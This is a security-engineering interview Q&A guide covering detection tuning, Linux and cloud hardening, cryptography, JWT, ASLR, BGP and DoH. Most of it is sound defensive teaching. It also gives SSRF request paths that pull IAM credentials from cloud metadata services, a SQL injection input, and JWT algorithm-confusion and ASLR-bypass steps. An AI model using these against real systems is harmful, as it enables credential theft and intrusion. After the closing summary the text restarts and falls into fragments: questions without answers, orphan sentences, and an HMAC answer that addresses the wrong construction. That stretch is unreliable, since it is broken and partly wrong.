Solutions: (1) Tune relentlessly: Every false positive should result in a rule update. Track FP rate per rule. Kill rules with >90% FP rate and rewrite them. (2) Tiered alerting: Not every detection needs a human. Tier 1: automated enrichment and triage (SOAR). Tier 2: analyst review. Tier 3: escalation. (3) Correlation rules: Single events are rarely actionable. Correlate: failed login + successful login from new location + sensitive data access = high-fidelity alert. (4) Context enrichment: Automatically attach: asset criticality, user context (VIP? Admin? Service account?), threat intel match, historical activity. (5) Detection-as-code: Version control detection rules. Require test cases (must catch known-bad, must not fire on known-good). PR review for rule changes. (6) Metrics: Track: alerts per analyst per shift, MTTD, MTTR, FP rate, detection coverage vs ATT&CK. Use metrics to drive improvement. (7) Playbooks: Clear, step-by-step investigation procedures for each alert type. Reduces decision fatigue and ensures consistency.

16. Secure Infrastructure

Q16.1: How do you harden a Linux server?

A: OS-level: (1) Minimal install — remove unnecessary packages. (2) Patch management — automated security updates (unattended-upgrades). (3) Disable root login over SSH. (4) SSH key-only authentication (disable password auth). (5) SSH hardening: PermitRootLogin no, PasswordAuthentication no, AllowUsers/AllowGroups, MaxAuthTries 3. (6) Configure sudo with least privilege (no NOPASSWD, specific commands only). (7) Remove SUID/SGID bits where not needed. (8) Set noexec,nosuid,nodev on /tmp, /var/tmp, /dev/shm.

Filesystem: (9) Enable filesystem auditing (auditd). (10) Set umask 027. (11) Immutable flag on critical configs (chattr +i). (12) Separate partitions for /, /var, /home, /tmp.

Network: (13) Host firewall (iptables/nftables) — default deny inbound, allow only required ports. (14) Disable IPv6 if not used. (15) Disable unnecessary services (systemctl disable). (16) TCP wrappers or firewall rules for service-level access control.

Kernel: (17) Sysctl hardening: kernel.randomize_va_space=2 (ASLR), net.ipv4.conf.all.rp_filter=1 (anti-spoofing), kernel.dmesg_restrict=1, kernel.kptr_restrict=2, disable IP forwarding. (18) Disable kernel module loading after boot (kernel.modules_disabled=1).

Monitoring: (19) Deploy EDR/HIDS agent. (20) Central log shipping (rsyslog/journald to SIEM). (21) File integrity monitoring (AIDE, OSSEC).

Baseline: CIS Benchmark for the specific OS distribution. Automate compliance checking with OpenSCAP or Lynis.

Q16.2: What is infrastructure as code (IaC) security?

A: IaC (Terraform, CloudFormation, Pulumi) defines infrastructure declaratively. Security implications:

Benefits: (1) Infrastructure changes go through code review (security review by default). (2) Drift detection — actual state compared to declared state. (3) Reproducibility — consistent security controls across environments. (4) Auditability — git history shows who changed what and when.

Risks: (1) Misconfigurations at scale — a single bad Terraform module deploys insecure infrastructure everywhere. (2) Secrets in state files — Terraform state can contain passwords, keys. (3) Overprivileged deployment credentials — CI/CD pipeline with admin access to entire cloud environment.

Security controls: (1) Policy-as-code scanning: Checkov, tfsec, Terrascan in CI/CD. Check for: public S3 buckets, security groups open to 0.0.0.0/0, unencrypted resources, missing logging. (2) OPA/Rego policies: Custom organization-specific policies enforced as admission control. (3) State file protection: Encrypted remote backend (S3 + DynamoDB lock with SSE), restricted access. (4) Module registry: Approved, security-reviewed Terraform modules that teams must use. (5) Least privilege for deployment: Scoped IAM roles per Terraform workspace/project. (6) Plan review: terraform plan output reviewed before terraform apply.

17. Advanced Topics

Q17.1: What is homomorphic encryption and when is it practical?

A: Homomorphic encryption allows computation on encrypted data without decrypting it. The result, when decrypted, matches the result of performing the computation on plaintext.

Types: (1) Partially homomorphic (PHE): Supports one operation (addition OR multiplication). RSA is multiplicatively homomorphic. Paillier is additively homomorphic. (2) Somewhat homomorphic (SHE): Supports limited number of both operations. (3) Fully homomorphic (FHE): Supports arbitrary computations. Lattice-based schemes (BFV, CKKS, TFHE).

Practical use cases today: (1) Private set intersection (PSI) — two parties determine common elements without revealing their full sets. Used in ad measurement, contact discovery. (2) Encrypted database queries — search encrypted data without decrypting. (3) Secure multi-party computation — federated machine learning on encrypted data. (4) Privacy-preserving analytics — aggregate statistics without accessing individual records.

Limitations: Performance overhead is still 1000-1,000,000x compared to plaintext computation (depending on scheme and operation). Key sizes are large (MB to GB). Not practical for general-purpose computation. Active area of research with rapid improvements.

Q17.2: Explain side-channel attacks. Give examples and mitigations.

A: Side-channel attacks extract secrets by observing physical characteristics of computation rather than attacking the algorithm itself.

Types: (1) Timing attacks: Measure execution time to infer secret values. Example: comparing password hash byte-by-byte — early mismatch returns faster, revealing correct bytes. Mitigation: constant-time comparison functions. (2) Cache attacks (Spectre/Meltdown): Exploit CPU speculative execution and cache timing to read kernel memory or cross-process data. Spectre (CVE-2017-5753): tricks speculative execution into accessing out-of-bounds memory, then measures cache timing to infer the value. Meltdown (CVE-2017-5754): reads kernel memory from userspace via speculative execution. Mitigations: KPTI (kernel page table isolation), retpoline, microcode updates, process isolation. (3) Power analysis: Monitor power consumption of cryptographic hardware to extract keys. Relevant for smartcards, HSMs. Mitigation: constant-power implementations, noise injection. (4) Electromagnetic emanation (TEMPEST): RF emissions from cables, screens can be intercepted and reconstructed. Mitigation: shielded cables, Faraday cages, TEMPEST-rated equipment. (5) Acoustic: Key extraction from the sound of CPU operations (demonstrated by Genkin et al. extracting RSA keys from laptop fans).

Software mitigations: Constant-time code for all crypto operations. Don't branch on secret values. Don't use secret values as array indices. Use blinding (randomize intermediate values). Language-level support: hmac.compare_digest() in Python, crypto.timingSafeEqual() in Node.js.

Q17.3: What is SSRF in cloud environments and why is it particularly dangerous?

A: SSRF in cloud environments is more dangerous than in traditional infrastructure because cloud metadata services provide an unauthenticated HTTP API with powerful credentials.

Cloud metadata attack chain: (1) Find SSRF vulnerability in web application. (2) Request http://169.254.169.254/latest/meta-data/iam/security-credentials/[role-name] (AWS) or http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token (GCP). (3) Retrieve temporary IAM credentials (access key, secret key, session token). (4) Use credentials from attacker's machine to access cloud resources — S3 buckets, databases, other services — based on the role's permissions.

Why cloud makes it worse: Traditional SSRF might scan internal ports or access internal services. Cloud SSRF gives you IAM credentials that can access the entire cloud environment depending on role permissions. The blast radius extends far beyond the compromised instance.

Mitigations: IMDSv2 (AWS), require Metadata-Flavor header (GCP), block metadata endpoint in Azure IMDS. Network-level blocking of metadata IP from application subnets. Least-privilege IAM roles on instances. SSRF-specific input validation (block private IP ranges, link-local addresses).

Q17.4: How do you approach securing a microservices architecture?

A: Microservices expand the attack surface — more services, more network communication, more credentials, more things to secure.

Service-to-service authentication: mTLS via service mesh (Istio, Linkerd) or application-level mTLS. Each service has its own identity (SPIFFE/SPIRE for workload identity). No shared secrets between services.

Authorization: Centralized policy engine (OPA) or per-service authorization. JWT tokens with scoped claims propagated through the call chain. Don't trust upstream services implicitly — verify authorization at each service.

Network: Default-deny network policies. Each service can only communicate with its declared dependencies. East-west traffic encrypted (mTLS). Egress controls — services can only reach approved external endpoints.

Data: Each service owns its data store — no shared databases. Data encrypted at rest with per-service keys. Audit logging of all data access.

API gateway: Central entry point for external traffic. Rate limiting, authentication, input validation, WAF integration. API versioning and deprecation.

Observability: Distributed tracing (Jaeger, Zipkin) for request flow visibility. Centralized logging with correlation IDs. Metrics for anomaly detection (unusual error rates, latency spikes, traffic patterns).

Supply chain: Container image scanning, base image standardization, dependency management per service, SBOM generation.

18. Behavioral and Leadership

Q18.1: You disagree with a VP who wants to ship a feature with a known critical vulnerability. What do you do?

A: (1) Quantify the risk: Don't say "this is insecure." Say "this vulnerability allows unauthenticated remote code execution. Based on our exposure and threat model, I estimate a 40% probability of exploitation within 90 days, with an impact of $X in incident response, regulatory fines, and customer trust." (2) Propose alternatives: "We can ship with these compensating controls (WAF rule, feature flag limiting exposure, enhanced monitoring) that reduce risk to acceptable levels while we fix the root cause in the next sprint." (3) Document the risk acceptance: If the VP accepts the risk, formalize it: documented risk acceptance with the VP's signature, timeline for remediation, compensating controls in place, and enhanced monitoring. (4) Escalate if necessary: If the risk is truly critical and the VP won't engage, escalate through the CISO or risk committee. Use the risk register. This is not going over someone's head — it's following the risk governance process. (5) Never block silently: Security is an enabler, not a blocker. Your job is to quantify risk and provide options, not to veto decisions.

Q18.2: How do you build a security culture in an engineering organization?

A: (1) Make security easy: Provide secure defaults (hardened base images, secure templates, pre-approved libraries). If the secure path is harder than the insecure path, developers will choose the insecure path. (2) Shift left, but don't dump: Integrate security tooling into developer workflow (IDE plugins, PR checks), but provide actionable guidance, not just alert spam. Fix the tooling when it produces false positives. (3) Security champions program: Train volunteer developers in each team as security liaisons. They handle local security reviews, triage SAST findings, and escalate to AppSec. (4) Blameless post-mortems: Focus on systemic fixes, not individual blame. "How do we prevent this class of bug?" not "who wrote this bad code?" (5) Gamification: Bug bounties (internal and external), CTF events, security training that's actually engaging. (6) Measure and share: Track metrics (time to remediate, vulnerability trends by team, security review coverage) and share them. Celebrate teams that improve. (7) Executive support: Security culture comes from the top. CISO needs a seat at the leadership table and visible executive sponsorship for security initiatives.

Q18.3: How do you prioritize a backlog of 500 security findings?

A: (1) Triage by exploitability and exposure: Internet-facing + actively exploited > internal + theoretical. Use EPSS (Exploit Prediction Scoring System) alongside CVSS. (2) Asset criticality: Vulnerability in payment processing system > vulnerability in internal wiki. Maintain an asset inventory with business criticality ratings. (3) Group by root cause: 50 XSS findings might be one missing output encoding library. Fix the root cause, close 50 findings. 200 findings might be one misconfigured Terraform module. (4) Apply SLAs: Critical (CVSS 9+, exploited in wild): 24-48 hours. High (CVSS 7-8.9): 7 days. Medium (CVSS 4-6.9): 30 days. Low: 90 days. (5) Communicate clearly: Provide developers with clear, actionable remediation guidance. Not "fix XSS" but "use DOMPurify.sanitize() on line 47 of comment.js before inserting into the DOM." (6) Track trends: Are findings decreasing over time? If not, invest in prevention (training, secure defaults, SAST) rather than just remediation.

19. Emerging Threats and Advanced Concepts

Q19.1: What is the impact of quantum computing on cryptography?

A: What breaks: Shor's algorithm on a sufficiently large quantum computer breaks RSA, ECC, and Diffie-Hellman — all public-key cryptography based on integer factorization or discrete logarithm. This breaks TLS key exchange, digital signatures, PKI infrastructure.

What survives: Symmetric cryptography is weakened but not broken — Grover's algorithm provides quadratic speedup to brute force, so AES-128 effectively becomes AES-64 strength. AES-256 becomes AES-128 strength — still secure. Hash functions similarly reduced but remain viable at doubled output sizes.

Timeline: Cryptographically relevant quantum computers (CRQC) are estimated 10-20+ years away (as of 2026), but "harvest now, decrypt later" attacks mean sensitive data encrypted today could be decrypted in the future.

Post-quantum cryptography (PQC): NIST standardized PQC algorithms in 2024: ML-KEM (Kyber, lattice-based key encapsulation), ML-DSA (Dilithium, lattice-based digital signature), SLH-DSA (SPHINCS+, hash-based signature). Action now: (1) Inventory all cryptographic usage. (2) Identify systems handling data with long confidentiality requirements. (3) Begin hybrid deployments (classical + PQC). (4) Test PQC algorithm performance impact. (5) Plan PKI migration.

Q19.2: What is a confused deputy attack?

A: A confused deputy attack occurs when a trusted, privileged program is tricked into misusing its authority by a less-privileged attacker.

Classic example: A compiler with write access to system billing files. User specifies output file as the billing file. Compiler writes to it because it has permission — but the USER shouldn't have that permission. The compiler (deputy) is "confused" about whether it's acting on behalf of its own authority or the user's.

Modern examples: (1) SSRF: Web server (deputy) has network access to internal services. Attacker tricks it into making requests to internal endpoints the attacker can't reach directly. (2) IAM role assumption: Lambda function (deputy) with broad IAM permissions is triggered by user input. Attacker crafts input that causes the Lambda to access resources the attacker shouldn't reach. (3) Cross-account access in AWS: Service in Account A (deputy) has trust relationship allowing access to Account B resources. Attacker in Account A tricks the service into accessing Account B on attacker's behalf.

Mitigations: Capability-based security, explicit authorization delegation (AWS external IDs for cross-account roles), input validation on resource identifiers, principle of least privilege for deputy services.

20. Practical Scenarios

Q20.1: Design the authentication system for a new banking application.

A: Authentication factors: (1) Password with Argon2id hashing (minimum 12 chars, check against breached password database — HaveIBeenPwned API k-anonymity model). (2) FIDO2/WebAuthn hardware key or platform authenticator as primary MFA (phishing-resistant). (3) TOTP as fallback MFA (Google Authenticator, Authy). (4) SMS as emergency recovery only (not primary MFA — SIM swapping risk).

Session management: Short-lived JWT access tokens (15 minutes). Refresh tokens with rotation (single use, stored server-side, invalidated on use). Session bound to device fingerprint and IP range. Re-authentication required for sensitive operations (transfers, payee changes) — step-up authentication.

Account security: Progressive lockout (exponential backoff, not hard lockout — prevents DoS). CAPTCHA after 3 failed attempts. Alert on: new device, new location, impossible travel, failed MFA. Account recovery via identity verification (not security questions — they're guessable).

Adaptive authentication: Risk engine evaluates: device posture, location, time, behavioral biometrics, transaction patterns. Low risk: no MFA challenge. Medium risk: MFA prompt. High risk: step-up authentication + transaction limit reduction. Critical risk: block and alert.

Infrastructure: Secrets in HSM (signing keys for JWTs). Rate limiting per user and per IP. Centralized authentication service (not implemented per-microservice). Audit logging of all authentication events with retention.

Q20.2: Your SIEM alert shows a spike in DNS queries to a single domain from 15 different internal hosts. Walk through your investigation.

A: Minute 0-5 (triage): (1) What domain? Check threat intel — known C2? DGA-generated? Recently registered? (2) What hosts? Workstations or servers? Same department/subnet? (3) When did it start? Sudden spike or gradual increase? (4) Query types? A records, TXT records (data exfiltration indicator), CNAME?

Minute 5-15 (scoping): (5) Pull full DNS logs for the domain — total volume, query patterns, subdomain entropy (high entropy = possible DNS tunneling/exfiltration). (6) Check proxy logs — are the same hosts also making HTTP/HTTPS connections to related domains? (7) Check EDR telemetry on affected hosts — what process is generating the DNS queries? Is it a known application or suspicious process? (8) Check if the domain resolves to known-bad infrastructure (IP reputation, ASN, hosting provider).

Minute 15-30 (determination): If malicious indicators: (9) Contains the affected hosts (network isolation). (10) Memory dump of representative host. (11) Block the domain at DNS resolver and firewall. (12) Full EDR investigation — identify the process, its parent, when it was installed, how it got there (email attachment? drive-by download? lateral movement?). (13) Check all 15 hosts for common indicators — same malware hash, same persistence mechanism, same initial access vector.

If benign: (14) Document the false positive. (15) Tune the alert rule (add exception for the domain if legitimate, adjust threshold).

Post-analysis: (16) If malware: determine patient zero, full scope assessment, eradicate across all affected hosts, block all associated IOCs, update detection rules. (17) Report to stakeholders.

Q20.3: You're asked to assess the security of a third-party SaaS vendor that will handle customer PII. What do you evaluate?

A: Documentation review: (1) SOC 2 Type II report (most recent, review the Type I vs Type II distinction — Type II tests over time, Type I is point-in-time). Read the exceptions and management responses. (2) Penetration test report (third-party, recent, scope covers your use case). (3) Privacy policy and data processing agreement (DPA). (4) Incident response plan and breach notification commitment.

Technical assessment: (5) Data encryption at rest and in transit (algorithms, key management — do they use an HSM?). (6) Authentication model — do they support SSO/SAML/OIDC integration with your IdP? (7) Access controls — can you enforce RBAC? Is there audit logging? Can you review access logs? (8) Data isolation — multi-tenant architecture review. How is your data separated from other customers? (9) API security — authentication, rate limiting, input validation. (10) Data residency — where is data stored? Can you control geographic location?

Operational assessment: (11) Vulnerability management program — patching SLAs, scanning frequency. (12) Employee security — background checks, security training, access provisioning/deprovisioning. (13) Subprocessors — who else handles the data? (14) Business continuity — RTO/RPO, backup strategy, disaster recovery testing. (15) Right to audit — can you or a third party audit their environment?

Contractual requirements: (16) Data deletion on contract termination. (17) Breach notification timeline (align with your regulatory requirements). (18) Liability and indemnification. (19) Insurance coverage. (20) SLA with security-relevant metrics.

21. Cryptographic Protocol Analysis

Q21.1: Walk through the TLS 1.3 handshake in detail.

A: TLS 1.3 achieves 1-RTT handshake (vs 2-RTT in TLS 1.2):

ClientHello: Client sends: supported cipher suites (only AEAD: AES-128-GCM, AES-256-GCM, ChaCha20-Poly1305), supported groups (X25519, P-256), key_share extension (client's ECDHE public key — speculative, reducing round trips), supported_versions (TLS 1.3), signature_algorithms, PSK for 0-RTT resumption (optional).

ServerHello: Server sends: chosen cipher suite, chosen group, server's key_share (ECDHE public key). From this point, both sides can compute the shared secret and derive handshake keys.

Encrypted extensions: (encrypted with handshake keys) Server sends additional parameters: ALPN negotiation, server name acknowledgment.

Certificate: Server's certificate chain.

CertificateVerify: Server signs a transcript hash of the handshake with its private key — proves possession of the private key corresponding to the certificate. This replaces the static RSA key exchange.

Finished: HMAC over the handshake transcript. Confirms handshake integrity and key confirmation.

Client Finished: Client sends Finished message. Both sides derive application traffic keys from the handshake.

Key improvements over TLS 1.2: Removed RSA key exchange (mandates PFS), removed CBC cipher suites (prevents padding oracle attacks), removed renegotiation, removed compression (prevents CRIME attack), 1-RTT (faster), 0-RTT resumption available (with replay protection caveats), simplified cipher suite negotiation (only 5 suites vs hundreds).

Q21.2: What are the security implications of JWT?

A: JWT structure: Header.Payload.Signature (Base64URL encoded). The payload is NOT encrypted — it's just encoded. Anyone can read JWT claims.

Common vulnerabilities: (1) Algorithm confusion (CVE-2015-9235): alg: none disables signature verification. alg: HS256 with the RSA public key as the HMAC secret — if the server accepts both RSA and HMAC, attacker signs with the public key (which is public) using HMAC. Mitigation: hardcode expected algorithm server-side, never trust the JWT's alg header. (2) Missing validation: Not checking exp (expiration), iss (issuer), aud (audience). (3) Insecure key storage: HMAC secret too short or hardcoded. (4) Sensitive data in payload: PII, permissions in unencrypted JWT. Use JWE if payload must be confidential. (5) No revocation mechanism: JWTs are valid until expiration. Mitigation: short-lived tokens (5-15 minutes) + refresh token rotation, or token blacklist (defeats the stateless benefit).

Best practices: (1) Use asymmetric signing (RS256 or EdDSA) for distributed verification. (2) Short expiration (5-15 minutes). (3) Validate all claims (exp, iss, aud, nbf). (4) Rotate signing keys periodically. (5) Don't store sensitive data in claims. (6) Use kid header to support key rotation. (7) Bind tokens to client (DPoP — Demonstrating Proof-of-Possession).

22. Operating Systems and Exploitation

Q22.1: What is ASLR and how can it be bypassed?

A: Address Space Layout Randomization randomizes the memory addresses of stack, heap, libraries, and executable base on each execution. Prevents attackers from predicting where code/data resides in memory, breaking hardcoded ROP gadget addresses and shellcode jumps.

Bypass techniques: (1) Information leak: Memory disclosure vulnerability reveals a single address — attacker calculates base address of the module and adjusts all gadget offsets. Single leak defeats ASLR entirely. (2) Brute force: On 32-bit systems, entropy is low enough (~16 bits for stack) to brute-force. 64-bit ASLR has much higher entropy (28+ bits). (3) Return-to-PLT: PLT (Procedure Linkage Table) entries may be at known offsets even with ASLR if PIE (Position Independent Executable) is not enabled. (4) Partial overwrite: Overwrite only the lower bytes of a return address (which don't change due to page alignment). (5) JIT spray: JavaScript JIT compilers place attacker-influenced constants at predictable locations. (6) Non-ASLR modules: If any loaded module doesn't use ASLR, its addresses are fixed — use gadgets from that module.

Defense: Enable ASLR system-wide + compile all binaries as PIE + high entropy ASLR (on Linux: randomize_va_space=2) + stack canaries + DEP/NX + CFI (Control Flow Integrity).

Q22.2: What is the difference between SELinux and AppArmor?

A: Both are Linux Mandatory Access Control (MAC) systems implemented as Linux Security Modules (LSM).

SELinux (Label-based): Every process, file, socket, and port gets a security label (context): user:role:type:level. Policy defines which types can access which types (type enforcement). Default-deny — if no rule allows it, it's denied. Extremely granular but complex. Used by: RHEL, Fedora, CentOS, Android. Developed by NSA.

AppArmor (Path-based): Profiles define what files (by path), network access, and capabilities a program can access. Per-program profiles rather than system-wide labeling. Easier to write and understand. Can run in complain mode (log violations without enforcing) for profiling. Used by: Ubuntu, SUSE, Debian.

Key differences: SELinux labels persist with the file (in extended attributes) — works across renames/moves. AppArmor uses paths — renaming a file changes whether a rule applies. SELinux is more comprehensive (covers IPC, networking, sockets at granular level). AppArmor is easier to adopt (profile individual applications without system-wide policy).

When to use: SELinux for high-security environments requiring comprehensive MAC (government, financial). AppArmor for containerized workloads, application sandboxing, and environments where operational simplicity matters. Both dramatically reduce the impact of application compromise.

23. Security Automation and DevSecOps

Q23.1: How do you implement security guardrails that don't slow down developers?

A: The goal is to make the secure path the easy path:

(1) Pre-commit: Secrets scanning (trufflehog, gitleaks) — blocks credential commits instantly. Fast, prevents the most embarrassing class of vulnerability.

(2) CI pipeline (fast feedback): SAST with tuned rules (Semgrep) — runs in <2 minutes, only high-confidence rules, inline comments on the PR. SCA (dependency check) — flags known-vulnerable dependencies with upgrade path.

(3) PR review automation: Auto-assign security reviewer for changes to auth, crypto, IAM, or infrastructure code (via CODEOWNERS). Bot comments with security checklist for sensitive file patterns.

(4) Deployment gates: Container image scanning — block deployment of images with Critical/High CVEs. IaC scanning (Checkov) — block deployments that violate security policies (public S3, unencrypted databases).

(5) Golden paths: Provide approved templates, modules, and libraries that are secure by default. Internal CLI tools that scaffold new services with security controls baked in. Secure base container images maintained by the platform team.

(6) Self-service: Security tooling dashboard where developers can see their own findings, understand them, and track remediation. Don't make developers open tickets to get security feedback.

Key principle: Shift left, but shift LEFT — not shift DUMP. Every automated finding must be actionable, have clear remediation guidance, and have a low false-positive rate. One false positive in a PR check costs more developer trust than ten true positives gain.

24. Network Protocols Deep Dive

Q24.1: How does BGP work and what are the security risks?

A: BGP (Border Gateway Protocol) is the routing protocol of the internet. Autonomous Systems (ASes) announce IP prefix ownership to peers. Routers build routing tables from BGP announcements and select best paths based on AS path length, policy, and preferences.

Security risks: (1) BGP hijacking: Any AS can announce any IP prefix. If accepted by peers, traffic destined for that prefix routes to the hijacker. No authentication in BGP — announcements are trusted by default. Examples: Pakistan Telecom hijacking YouTube (2008), China Telecom route leaks. (2) Route leaks: AS accidentally announces routes it received from one peer to another peer, becoming a transit when it shouldn't be. Causes traffic detours through unintended paths. (3) Path manipulation: Attacker prepends or manipulates AS path to influence routing decisions.

Mitigations: (1) RPKI (Resource Public Key Infrastructure): Cryptographically signs Route Origin Authorizations (ROAs) — validates that the announcing AS is authorized to originate the prefix. (2) BGPsec: Extends RPKI to validate the entire AS path (not just origin). Limited deployment. (3) IRR (Internet Routing Registry) filtering: Peers filter announcements against registered routes. (4) Route filtering best practices: Max prefix limits, bogon filtering, prefix length filtering (/24 minimum for IPv4). (5) BGP monitoring: RIPE RIS, RouteViews, BGPStream for real-time hijack detection.

Q24.2: What is DNS over HTTPS (DoH) and what are the security implications?

A: DoH encrypts DNS queries inside HTTPS (port 443), making them indistinguishable from regular web traffic.

Security benefits: (1) Prevents DNS eavesdropping by ISPs, network operators, and on-path attackers. (2) Prevents DNS manipulation and censorship. (3) Provides integrity verification of DNS responses.

Security concerns for defenders: (1) Bypasses DNS-based security controls: Enterprise DNS filtering, DNS sinkholing, and DNS-based threat detection are all bypassed if clients use external DoH resolvers (Cloudflare, Google). (2) Malware using DoH for C2: DNS-based C2 detection relies on inspecting DNS traffic — DoH makes this invisible. (3) Visibility loss: Security teams lose DNS query logs, a critical data source for threat hunting and incident response. (4) Exfiltration channel: DNS exfiltration via DoH is harder to detect — it looks like normal HTTPS traffic.

Enterprise response: (1) Deploy internal DoH resolver — provides encryption while maintaining visibility. (2) Block external DoH providers at the firewall (known IPs) and via DNS canary domain checks. (3) Group Policy / MDM to configure managed devices to use enterprise DNS. (4) TLS inspection for DoH traffic (controversial — breaks privacy guarantees). (5) Detect DoH usage through SNI inspection or JA3/JA4 fingerprinting of known DoH resolver TLS connections.

Summary

This document covers 120+ topics across the full spectrum expected at principal-level security engineering interviews. Key areas:

Network security: OSI model, TCP/IP, DNS, ARP, routing, IDS/IPS
Cryptography: Symmetric/asymmetric, KDFs, PKI, TLS 1.3, PFS, HMAC, block cipher modes
Application security: OWASP Top 10, XSS, CSRF, SSRF, SQLi, deserialization, code review, SAST/DAST
Cloud security: Shared responsibility, IAM, network isolation, IMDS, key management
Identity: OAuth/OIDC, SAML, Kerberos, RBAC/ABAC, Zero Trust
Incident response: NIST lifecycle, evidence volatility, chain of custody, blast radius, legal/regulatory
Architecture: Defense in depth, blast radius containment, multi-tenant security, threat modeling, CI/CD security
Risk management: FAIR model, CVSS, risk registers, executive communication
Detection engineering: TTP-based detection, Sigma rules, alert fatigue, SOC operations
Forensics: Memory forensics, disk forensics, order of volatility
Advanced topics: Post-quantum crypto, side channels, supply chain attacks, microservices security, BGP security

Security Mastery — Principal-Level Interview Q&A

120+ questions covering the depth and breadth expected at Staff/Principal/Distinguished security engineer levels. Each answer is written at the density a hiring panel expects — no fluff, no hedging.

1. Network Security Fundamentals

Q1.1: Walk through what happens when you type `https://example.com` into a browser, focusing on the security-relevant steps.

Q1.2: Explain the difference between TCP and UDP. When would you choose one over the other from a security perspective?

Q1.3: How does DNS exfiltration work and how do you detect it?

Prevention: Force all DNS through internal resolvers (block outbound port 53/853). Deploy DNS filtering. Monitor for DoH/DoT bypass.

Q1.4: Explain ARP spoofing. What is the blast radius and how do you mitigate it?

Blast radius: Entire broadcast domain (VLAN/subnet). All hosts update their ARP cache with the poisoned entry.

Q1.5: What is the difference between a router, a switch, and a firewall? Where does each sit in a defense-in-depth architecture?

Q1.6: Explain subnetting. How does it relate to security?

A: Subnetting divides a network into smaller broadcast domains using subnet masks. A /24 (255.255.255.0) gives 254 usable hosts. A /28 gives 14 usable hosts.

Q1.7: What is the difference between IDS and IPS? What are the detection modes?

Deployment: Network-based (NIDS/NIPS) at network choke points. Host-based (HIDS/HIPS) on endpoints (OSSEC, Wazuh). Cloud-based (VPC flow logs + GuardDuty, Azure Sentinel).

2. Cryptography

Q2.1: Explain the difference between symmetric and asymmetric encryption. Why do we use both in TLS?

Q2.2: What is Perfect Forward Secrecy (PFS) and why does it matter?

TLS 1.3 mandates PFS — only ECDHE and DHE key exchanges are supported. RSA key exchange was removed entirely.

Q2.3: Explain hashing vs. encryption vs. encoding. When do you use each?

Q2.4: How should passwords be stored? Walk through the full chain.

A: Never store plaintext or simple hashes. Use a key derivation function (KDF) designed for password hashing:

Argon2id (winner of Password Hashing Competition) — preferred. Resistant to GPU/ASIC attacks via memory-hardness. Parameters: memory cost (64MB+), iterations (3+), parallelism (1+).
bcrypt — well-proven, 72-byte input limit. Cost factor 10+ (2^10 iterations).
scrypt — memory-hard, but harder to tune correctly than Argon2id.

Q2.5: What is a Key Derivation Function (KDF) and what are the different types?

A: KDF derives one or more cryptographic keys from a source of key material.

Q2.6: Explain PKI. What happens when a CA is compromised?

Q2.7: What is the difference between Diffie-Hellman and RSA key exchange?

ECDHE vs DHE: ECDHE uses elliptic curves (X25519, P-256) — smaller keys, faster computation. 256-bit ECDHE ≈ 3072-bit DHE in security strength. ECDHE is the standard for TLS 1.3.

Q2.8: What are block cipher modes of operation? Which should you use?

A: Block ciphers (AES) encrypt fixed-size blocks (128 bits for AES). Modes define how to handle messages longer than one block.

ECB (Electronic Codebook): Each block encrypted independently. Catastrophically insecure — identical plaintext blocks produce identical ciphertext blocks (the famous "ECB penguin"). Never use.

CTR (Counter): Turns block cipher into stream cipher. Encrypts counter values, XORs with plaintext. Parallelizable. No padding needed. Requires unique nonce per message. No built-in integrity.

Q2.9: What is HMAC and why is it better than `hash(key || message)`?

A: HMAC (Hash-based Message Authentication Code) = H((K' ⊕ opad) || H((K' ⊕ ipad) || message)). Two nested hash computations with padded key.

Why not hash(message || key): Vulnerable if the hash function has collisions — attacker finds two messages with same hash, both validate.

3. Application Security

Q3.1: Walk through the OWASP Top 10 2025. What changed and why?

A: The 2025 update reshuffles and introduces new categories reflecting the evolving threat landscape:

A01 Broken Access Control — Still #1. Includes IDOR, missing function-level access control, CORS misconfiguration, metadata manipulation. Most common finding in real-world testing.
A02 Security Misconfiguration — Moved up. Default credentials, unnecessary features enabled, overly permissive cloud IAM, missing security headers, verbose error messages.
A03 Software Supply Chain Failures — NEW. Dependency confusion, typosquatting, compromised CI/CD pipelines, malicious packages (SolarWinds, codecov, xz-utils backdoor). Reflects the industry's growing attack surface in build systems.
A04 Cryptographic Failures — Weak algorithms, missing encryption, hardcoded keys, poor key management, missing TLS.
A05 Injection — SQL, NoSQL, OS command, LDAP, XSS (now folded in). Mitigated by parameterized queries, input validation, output encoding.
A06 Insecure Design — Missing threat modeling, insecure design patterns, missing business logic controls. Cannot be fixed by perfect implementation — the design itself is flawed.
A07 Authentication Failures — Credential stuffing, weak passwords, missing MFA, session fixation.
A08 Software or Data Integrity Failures — Insecure deserialization, unsigned updates, CI/CD integrity gaps.
A09 Security Logging and Alerting Failures — Missing audit logs, no alerting on suspicious activity, logs not protected from tampering.
A10 Mishandling of Exceptional Conditions — NEW title. Error handling that leaks information, fails open, or creates exploitable states.

Key shift: Supply chain entered the list, reflecting real-world attack trends. XSS folded into injection.

Q3.2: Explain XSS types and their mitigations.

Stored XSS: Payload persisted (database, file). Every user viewing the content gets hit. Higher impact — no social engineering needed. Example: malicious comment in a forum.

Q3.3: Explain CSRF and why SameSite cookies changed the landscape.

Traditional mitigations: Synchronizer token pattern (unique token per session/form, validated server-side). Double-submit cookie pattern. Origin/Referer header checking.

Q3.4: What is SSRF and how do you prevent it?

A: Server-Side Request Forgery: Attacker makes the server send requests to unintended destinations — typically internal services, cloud metadata endpoints, or internal APIs.

Impact: Access to internal services behind firewall, cloud credential theft (IMDS), port scanning internal network, reading internal files via file:// protocol.

Q3.5: Explain SQL injection. What are the variants and how do you prevent it?

A: Application constructs SQL queries by concatenating user input: "SELECT * FROM users WHERE id = '" + input + "'". Attacker input: ' OR 1=1 -- returns all users.

Q3.6: What is insecure deserialization and why is it dangerous?

Impact: Remote code execution, authentication bypass, privilege escalation, DoS.

Q3.7: How would you conduct a security code review?

Tools: SAST (Semgrep, CodeQL, SonarQube), SCA (Snyk, OSV-Scanner), secrets scanning (trufflehog, gitleaks).

Q3.8: What is the difference between SAST, DAST, IAST, and SCA?

Integrated approach: SAST + SCA in CI/CD pipeline (every PR). DAST in staging/pre-prod. IAST during QA testing. Secrets scanning as pre-commit hook.

4. Cloud Security

Q4.1: Explain the shared responsibility model. Where do most breaches occur?

Q4.2: An AWS access key is leaked on GitHub. Walk through your response.

Q4.3: How do you design network isolation in AWS?

NACLs (stateless): Subnet-level. Support allow and deny. Evaluate rules in order. Use for: blocking known bad IPs, additional subnet-level controls.

Zero trust overlay: Even within a VPC, use mutual TLS (mTLS) between services. Don't trust the network — authenticate every connection.

Q4.4: What are the most critical AWS IAM security controls?

Q4.5: Explain the IMDSv1 vs IMDSv2 difference and why it matters.

